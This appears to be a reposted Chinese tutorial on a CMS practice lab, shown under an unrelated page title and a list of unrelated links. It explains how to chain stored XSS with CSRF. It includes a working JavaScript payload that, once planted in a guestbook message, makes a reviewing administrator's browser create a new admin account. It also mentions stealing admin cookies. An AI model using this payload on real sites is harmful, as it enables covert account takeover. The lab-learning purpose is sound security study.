当前位置: 首页 > news >正文

城乡建设部门户网站百度认证平台

城乡建设部门户网站,百度认证平台,广州燃气集团有限公司,营销计划书7个步骤目录 简介 如何进行实战 进入后台创建一个新用户进行接口分析 构造注入代码 寻找XSS漏洞并注入 小结 简介 (案例中将使用cms靶场来进行演示) 在实战中CSRF利用条件十分苛刻,因为我们需要让受害者点击我们的恶意请求不是一件容易的事情…

目录

简介

如何进行实战

进入后台创建一个新用户进行接口分析

构造注入代码

寻找XSS漏洞并注入

小结


简介

(案例中将使用cms靶场来进行演示)

在实战中CSRF利用条件十分苛刻,因为我们需要让受害者点击我们的恶意请求不是一件容易的事情 。所以单单一个CSRF漏洞危害是很小的,所以我们为了扩大危害,就需要借助XSS漏洞与之配合 。我们利用XSS漏洞让受害者执行JS代码,JS代码有发起请求的功能,借此功能我们配合CSRF漏洞达成我们的攻击。我们利用XSS执行JS代码的时候发起我们构造的恶意请求,从而能达到让受害者无感知地受到攻击。

如何通过js发起请求,具体来说有以下步骤

  1. 创建 XMLHttpRequest 实例

  2. 发出 HTTP 请求

  3. 接收服务器传回的数据

  4. 更新网页数据

如何进行实战

  1. 分析功能点的请求接口,构造恶意请求(创建网站后台管理员账密)

  2. 编写发起恶意请求的恶意JS

  3. 寻找XSS漏洞

  4. 使用恶意的JS进行XSS攻击 

进入后台创建一个新用户进行接口分析

构造注入代码

根据刚刚抓到的包构造创建一个新管理员的代码

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","添加管理员的页面",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=test&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

寻找XSS漏洞并注入

载我安装的cms中发现有留言板尝试注入,将刚刚编写好的注入代码插入到输入框,留言页面的输入框都可以尝试注入

留言成功

 现在我们到后台模拟管理员审核

(现在是没有管理员的)

 管理员查看留言

现在再看管理员界面发现多了一个管理员正是我们模拟创建的管理员

小结

你的xss漏洞打到网站后台,并不一定要添加管理员,你也可以抓取管理员的cookie。本次攻击的最大工臣还是xss漏洞,没有xss漏洞这次攻击是无从谈起的。

这个漏洞在如今已经已经几乎不存在了,因为csrf很好防御。


不嫌弃的点点关注,点点赞 ଘ(੭ˊᵕˋ)੭* ੈ✩‧₊˚

http://www.yayakq.cn/news/295059/

相关文章:

  • 电子商务网站建设过程报告网站建设步骤实践报告
  • 网站模板织梦免费网站编辑 教程
  • 网站推广需要数据整改吗宁波网站建设详细策划
  • 西宁网站建设的企业一条龙建站
  • 怎么做正规网站青海建设局网站
  • 手机电脑网站建设短视频企业信用信息查询公示系统浙江
  • 网站开发怎么赚钱做国外购物的网站怎么发货
  • 小榄网站建设推广嵌入式软件开发工程师培训
  • 简单网站如何制作宁陵做网站
  • 网站初期建设该做什么品牌建设是指什么
  • 建网站安全队徽logo设计
  • 漯河住房建设局网站上海app开发公司排名
  • 做网站公司北京建设银行网站会员用户名格式
  • 做电影网站 广告收入wap网站后台模板
  • 什么专业学做网站wordpress模板 单栏
  • 福永网站推广傻瓜化免费自助建站
  • php做的汽车销售网站燕郊医疗网站建设
  • 网站建设优化服务行情免费网站电视剧全免费的app
  • 手机网站 布局环保主题的网站模板
  • 微信公众号上微做网站开一个平台要多少钱
  • 网站被百度收录吗如何做网络推广公司
  • 专业微信网站重庆市最新新闻
  • 哪个公司可以专门做网站重庆建设网站的公司简介
  • 网站能给企业带来什么论坛网站备案
  • ps毕业设计做网站界面wordpress ssl 图片
  • 惠州市网站建设公司高端企业
  • 如何免费开自己的网站网站建设上海网站建设公司网站
  • 新云手机站官网百度手机管家
  • 做付费网站好注册安全工程师条件
  • 圣诞节网站模板定制网站建设推广方案